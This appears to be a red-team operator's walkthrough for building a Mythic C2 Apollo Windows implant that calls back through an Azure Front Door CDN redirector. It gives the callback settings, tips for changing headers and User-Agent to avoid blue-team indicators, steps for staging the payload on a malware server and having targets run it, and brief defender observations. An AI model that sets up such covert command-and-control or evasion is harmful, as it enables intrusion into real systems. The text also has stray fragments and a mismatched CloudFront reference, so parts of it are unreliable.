AZURE FRONT DOOR IMPLEMENTATION
#
root@oco:~$ BROWSER > MythicC2 > Navigation Pane > Create > Create Payload
Target OS: Windows
Payload Type: Apollo
Build Parameters: WinExe
Build Cmds into Agent: include all
C2 Profiles:
Method: http
Callback Host: {this is the CDN distribution domain name which is the exposed endpoint}
- {https://{cdnService}.azurefd.net}
Callback Interval in seconds: 10
Callback Jitter in percent: 23
Callback Port: 443
- everything else is default!
HTTP Headers
- use cases: {can be modified to accept only a specific HTTP Headers like cookies from a target}
User-Agent:
- use cases: {can be modified in case the attacker specified user-agent is now a known IOC for the blue team}
Payload Review:
Payload Name: {arbitraryName}.exe
Description: N/A
Create Payload!
* this payload can be downloaded from the payload section via the download URL
- once downloaded by the red team operator, it MUST be transferred to the Payload/Malware Server
- the target(s) downloads these payloads from the payload server#example trigger
PS C:\target> {payload}.exe
MythicC2 > Active Callbacks
Interaction: whoami
Interaction: ps
* since everything is happening via TLS/SSL connection, the blue team won't be able
to see/decrypt the cmds that were executed
- blue teams should be able to see an outbound ssl/tls connection to the IP of the
exposed redirector (aws cloudfront)see
- blue teams should also be able to see running processes w/ pids
- some indicators should also be visible via Windows Event Logs
- for thorough analysis, implement sysmon on the hosts and send the
logs to SIEMLast updated